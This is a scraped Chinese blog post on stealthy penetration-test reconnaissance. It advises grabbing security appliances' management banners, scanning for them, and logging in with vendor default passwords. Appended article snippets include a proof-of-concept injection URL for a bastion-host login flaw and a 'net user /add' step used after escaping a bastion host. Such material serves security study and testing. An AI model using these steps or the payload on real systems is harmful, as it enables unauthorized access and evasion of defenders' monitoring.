渗透实战之安全设备踩点

最新推荐文章于 2024-04-09 16:00:00 发布
最新推荐文章于 2024-04-09 16:00:00 发布
阅读量712 收藏
点赞数
分类专栏: Hacking 文章标签: 网络 工作 产品
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6753119
版权

转自:80009054


在的安全设备是越来越厉害,渗透的时候需要注意不要触发安全设备的报警。这个时候先做一个安全设备的踩点工作就显得很有必要了。当然,这个行为本身也可能触发报警,请君深思后再做决定。

整体的思路是通过设备的通用特征发现:


1、收集各种设备的通用特征。这个肯定是管理端口banner了,一般是443,也有一些是特殊的,不过这没关系,收集好了就行。这可是个体力活,得把大部分安全公司的产品呼过来,抓一下banner,再顺手把缺省密码记录下来。


2、在网络里使劲扫一次这些端口,把banner抓回来,分析之。

通过这种方式,不但可以发现网络里的报警器;还可以顺藤摸瓜,通过缺省密码登陆设备,说不定可以发现其他的网络或有趣的东西。

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB渗透测试之踩点
pygain的博客
10-03 3328
对于一个专业的白帽子来说,在开始真正的渗透测试之前,必须完成渗透测试的的信息收集。最首先的自然是踩点了,即对指定目标进行系统的的网站信息收集,攻击者尽可能多的收集目标单位的安全情况的方方面面。最后得到了一个独特的足迹。
小谈入侵踩点技术
kuxing100的专栏
08-26 952
转载请注明小3出品 谢谢 题记 这个东西其实整理了很久了 就放在笔记里,写了3页多,在些朋友的唆使下我就写出来吧 反正都早不是什么秘密了,就给菜鸟提个醒,让老鸟见个笑吧 -------------------------------------------- -小3----------------------------------------------------
学习笔记-常见安全设备渗透方法
人饭子的博客
10-30 1309
SecDevice - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 身份与访问控制 堡垒机 IMC 网络检测与响应 蜜罐 IDS 防火墙 WAF 网关 负载均衡 VPN 终端响应与检测 杀软 EDR 数据防泄漏系统 身份与访问控制 堡垒机 齐治堡垒机 Fofa: app...
渗透测试---信息搜集(拓扑路径踩点
孤的博客
09-24 753
traceroute traceroute是用来检测发出数据包的主机到目标主机之间所经过的网关数量的工具。traceroute的原理是试图以最小的TTL(存活时间)发出探测包来跟踪数据包到达目标主机所经过的网关,然后监听一个来自网关ICMP的应答。发送数据包的大小默认为38个字节。 原理:程序利用增加存活时间(TTL)来实现其功能。每当数据包(3个数据包包括源地址,目的地址和包发出的时间标签)经过...
渗透安全及渗透测试流程
niqiu320的博客
04-20 1639
网络安全的定义 什么是网络安全? 1、国际化标准组织(ISO)引用ISO-74982文献中对安全的定义:安全就是最大程度地减少数据和资源被攻击的可能性。 2、《计算机信息安全系统保护条例》中的第三条规范了包括计算机网络系统在内的计算机信息系统安全的概述:“计算机信息系统的安全保护,应当保障计算机及其相关的配套的设备、设施(含网络)的安全,运行环境的安全,保障信息的安全,保障计算机功能的正常发挥,以维护计算机信息系统的安全运行。” 3、从本质上讲,网络安全是指网络系统的硬件、软件和系统中的数据受到保护,不因
物联网安全之mqtt渗透实战.pdf
10-14
物联网安全之MQTT渗透实战 在物联网安全领域中,MQTT(Message Queuing Telemetry Transport)是一种轻量级的消息队列协议,广泛应用于物联网设备、移动端、Web端等领域。然而,MQTT协议的安全性却鲜为人知。因此,...
渗透实战之fuse.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
网络空间安全实战平台B100设备题目导出
04-29
渗透测试工具使用、数据分析、Windows系统安全、Linux系统安全、Web安全 CTF夺旗-攻击 CTF夺旗-防御
物联网安全之MQTT渗透实战 .pdf
09-05
【物联网安全之MQTT渗透实战】 物联网安全是一个重要的领域,特别是在使用MQTT(Message Queuing Telemetry Transport)协议的环境中。MQTT是一种轻量级的发布/订阅消息协议,广泛应用于资源有限的设备和网络环境,...
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
云安全-攻防视角下如何看待堡垒机
告白的博客
11-04 294
堡垒机是种网络安全设备,用于保护和管理企业内部网络与外部网络之间的访问。它作为一种中间节点,提供安全的访问控制和审计功能,用于保护内部网络免受未经授权的访问和攻击。堡垒机通常被用作跳板服务器,即堡垒机来管理和访问其他内部服务器。具有身份鉴别、帐号管理、权限控制、安全审计,身份访问控制等功能,堡垒机一般部署在内网,作为内网它所管控所有主机的安全审计系统平台,一般不会在外部网络暴露web界面。
[ 渗透入门篇 ] 渗透行业必备术语大集合(一)
fangyuan621的专栏
12-10 1657
渗透是一个漫长的过程,需要掌握的知识点很广,需要心无旁骛地去学。 有关这方面的专业术语有很多很多,我大概是总结了200来个,在这里分享一下。 在接下来几篇文章我就会提到一些有关渗透方向的专业术语,并作出相应的解释。 在简单介绍完这些术语之后,我会在针对某些专业术语进行深入探讨,欢迎持续关注。 本篇文章将对下面25个术语做出相应的解释: 肉鸡、抓鸡、堡垒机、木马、大马 小马、挂马、网页木马、一句话木马、后门 一句话后门、Shell、webshell、交互shell、远控 ...
内网穿透的应用-Linux JumpServer堡垒机:安全远程访问解决方案
Karka_的博客
04-09 643
JumpServer 是广受欢迎的开源堡垒机,是符合 4A 规范的专业运维安全审计系统。JumpServer帮助企业以更安全的方式管控和登录所有类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。下面介绍如何简单设置即可使本地jump server 结合cpolar 内网穿透实现远程访问jump server 管理界面.
【实操】渗透、越过堡垒机进行,CMD创建用户
vippomelo的博客
09-07 823
1.堡垒机比较繁琐,我想要进mstc远程操作,需要登录堡垒机,十分繁琐.现在如何越过堡垒机? 情景:登录堡垒机后,可以打开plsql应用. 方式: plsql有表导出功能,如下图:我通过这个功能作为突破口,打开cmd 或者powershell 窗口,以便命令操作. 点击红框中的文件夹,弹出如下窗口. 喜普大奔. 分步阅读 输入“添加用户”命令。命令的格式为net user username password /add,其中“username”是新用户的名称,“p...
进阶的sqlmap用法(参数讲解)
热门推荐
0yst3r ‘s blog
09-21 1万+
进阶的sqlmap用法 参数讲解 1>探测等级: --level 5 --level 5 指的是需要执行的测试等级 一共有5个等级(1-5) 不加 level 时,默认是1 5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。 level=2 http cookie会测试 level=3 http...
渗透测试工具之——WVSS(绿盟web应用漏洞扫描系统)概述
温柔小薛的博客
03-30 7674
WVSS 绿盟web应用漏洞扫描系统 (这个没有资源,我木有进行实际操作,这里只是简单的概述) 有硬件与软件,硬件接在交换机上 使用 新建任务 模板根据自己的需要选择 web认证 需要登陆扫描时选择 插件模板 比较特别的是web系统组件漏洞,很大一部分扫描软件没法测中间件漏洞 绿盟科技模板组 适合国内检测 W...
齐治堡垒机_任意用户登录漏洞
MD@@nr丫卡uer
04-12 1882
fofa查询语法 app=“齐治科技-堡垒机” 漏洞复现 漏洞POC为 http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
网站漏洞测试 从业界经验分析客户网站漏洞问题
网站安全专家
03-09 529
这几天在2020RSAC安全行业盛会上听了一名渗透大佬的经验分享,感觉得益匪浅。 一、渗透测试服务中的常见问题 1、对客户网站系统,之前在其他几家安全公司做过渗透测试服务,那么我们接手的话要如何进行?深入深入分析客户程序,认真细致发现程序全方位、深层次漏洞。 2、如果客户的程序,部署了环境waf防火墙服务,我们要如何进行?还可以绕过web防火墙采取渗透测试,比如还可以通过内部局域网的技术...
metasploit基础学习 渗透(拿shell)和后渗透(留后门)
qq_38348692的博客
08-10 3500
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令: (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引 (2)apt-get upgrade: 升级系统上安装的所有软件包 (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级 专业术语 (1)Auxiliaries:辅助模块,负责执行扫...
Kali Linux安全渗透实战指南
"Kali Linux安全渗透教程" 本教程是针对网络安全专业人士和爱好者的一份详尽指南,主要聚焦于利用Kali Linux进行安全渗透测试。Kali Linux是一款基于Debian的开源操作系统,专为渗透测试和道德黑客活动设计。它包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值